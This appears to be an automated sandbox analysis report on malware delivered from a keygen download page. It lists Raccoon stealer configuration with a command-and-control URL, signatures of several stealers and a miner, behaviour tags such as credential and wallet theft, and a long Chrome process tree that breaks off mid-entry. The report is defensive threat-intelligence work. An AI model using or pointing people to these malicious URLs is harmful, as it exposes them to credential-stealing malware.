Analysis

  • max time kernel
    1798s
  • max time network
    1790s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    18-04-2021 17:27

General

  • Target

    https://keygenit.com/d/3563ee088d1n7s312q6.html

  • Sample

    210418-bdbbr7kjy2

Malware Config

Extracted

Family

raccoon

Botnet

562d987fd49ccf22372ac71a85515b4d288facd7

Attributes
  • url4cnc

    https://telete.in/j90dadarobin

rc4.plain
rc4.plain

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Executes dropped EXE 28 IoCs
  • Loads dropped DLL 7 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops Chrome extension 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 7 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies data under HKEY_USERS 14 IoCs
  • Modifies registry class 13 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 58 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 16 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:352
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2800
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2820
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenit.com/d/3563ee088d1n7s312q6.html
        1⤵
        • Enumerates system info in registry
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:1040
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffc6e824f50,0x7ffc6e824f60,0x7ffc6e824f70
          2⤵
            PID:2580
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1480 /prefetch:2
            2⤵
              PID:196
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1708 /prefetch:8
              2⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:3748
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2148 /prefetch:8
              2⤵
                PID:2308
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2876 /prefetch:1
                2⤵
                  PID:2584
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2884 /prefetch:1
                  2⤵
                    PID:1968
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1
                    2⤵
                      PID:3788
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3676 /prefetch:1
                      2⤵
                        PID:3960
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3656 /prefetch:1
                        2⤵
                          PID:4112
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3804 /prefetch:1
                          2⤵
                            PID:4144
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4496 /prefetch:8
                            2⤵
                              PID:4420
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6096 /prefetch:8
                              2⤵
                                PID:4704
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6136 /prefetch:8
                                2⤵
                                  PID:4732
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6080 /prefetch:8
                                  2⤵
                                    PID:4808
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6240 /prefetch:8
                                    2⤵
                                      PID:4844
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6248 /prefetch:8
                                      2⤵
                                        PID:4884
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6224 /prefetch:8
                                        2⤵
                                          PID:4896
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6112 /prefetch:8
                                          2⤵
                                            PID:4956
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6748 /prefetch:8
                                            2⤵
                                              PID:4972
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5712 /prefetch:8
                                              2⤵
                                                PID:5032
                                              • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                                2⤵
                                                  PID:5044
                                                  • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                    "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff70d1aa890,0x7ff70d1aa8a0,0x7ff70d1aa8b0
                                                    3⤵
                                                      PID:5088
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6748 /prefetch:8
                                                    2⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:4208
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6752 /prefetch:8
                                                    2⤵
                                                      PID:4124
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6392 /prefetch:8
                                                      2⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:4164
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6304 /prefetch:8
                                                      2⤵
                                                        PID:4188
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5516 /prefetch:8
                                                        2⤵
                                                          PID:4580
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5348 /prefetch:8
                                                          2⤵
                                                            PID:2212
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5372 /prefetch:8
                                                            2⤵
                                                              PID:4744
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5416 /prefetch:8
                                                              2⤵
                                                                PID:4752
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5328 /prefetch:8
                                                                2⤵
                                                                  PID:4812
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5528 /prefetch:8
                                                                  2⤵
                                                                    PID:4868
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5064 /prefetch:8
                                                                    2⤵
                                                                      PID:4864
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5540 /prefetch:8
                                                                      2⤵
                                                                        PID:4900
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4940 /prefetch:8
                                                                        2⤵
                                                                          PID:5008
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6772 /prefetch:8
                                                                          2⤵
                                                                            PID:4912
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6784 /prefetch:8
                                                                            2⤵
                                                                              PID:4948
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6796 /prefetch:8
                                                                              2⤵
                                                                                PID:5024
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6808 /prefetch:8
                                                                                2⤵
                                                                                  PID:4120
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6820 /prefetch:8
                                                                                  2⤵
                                                                                    PID:5056
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6852 /prefetch:8
                                                                                    2⤵
                                                                                      PID:4760
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6840 /prefetch:8
                                                                                      2⤵
                                                                                        PID:4280
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7568 /prefetch:8
                                                                                        2⤵
                                                                                          PID:4984
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6648 /prefetch:8
                                                                                          2⤵
                                                                                            PID:4472
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7912 /prefetch:8
                                                                                            2⤵
                                                                                              PID:3340
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8044 /prefetch:8
                                                                                              2⤵
                                                                                                PID:4496
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8072 /prefetch:8
                                                                                                2⤵
                                                                                                  PID:4964
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8084 /prefetch:8
                                                                                                  2⤵
                                                                                                    PID:4236
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8096 /prefetch:8
                                                                                                    2⤵
                                                                                                      PID:4720
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8108 /prefetch:8
                                                                                                      2⤵
                                                                                                        PID:4672
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8120 /prefetch:8
                                                                                                        2⤵
                                                                                                          PID:5124
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7096 /prefetch:1
                                                                                                          2⤵
                                                                                                            PID:5192
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8448 /prefetch:1
                                                                                                            2⤵
                                                                                                              PID:5256
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8112 /prefetch:1
                                                                                                              2⤵
                                                                                                                PID:5320
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8064 /prefetch:8
                                                                                                                2⤵
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                PID:5388
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8444 /prefetch:8
                                                                                                                2⤵
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                PID:5432
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2120 /prefetch:8
                                                                                                                2⤵
                                                                                                                  PID:5476
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8428 /prefetch:8
                                                                                                                  2⤵
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  PID:5492
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8280 /prefetch:8
                                                                                                                  2⤵
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  PID:5600
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7084 /prefetch:8
                                                                                                                  2⤵
                                                                                                                    PID:5644
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3832 /prefetch:8
                                                                                                                    2⤵
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:5696
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2224 /prefetch:8
                                                                                                                    2⤵
                                                                                                                      PID:5748
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3824 /prefetch:8
                                                                                                                      2⤵
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      PID:5796
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1464,1911526296496683974,1097370545180520072,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3860 /prefetch:8
                                                                                                                      2⤵
                                                                                                                        PID:5916
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
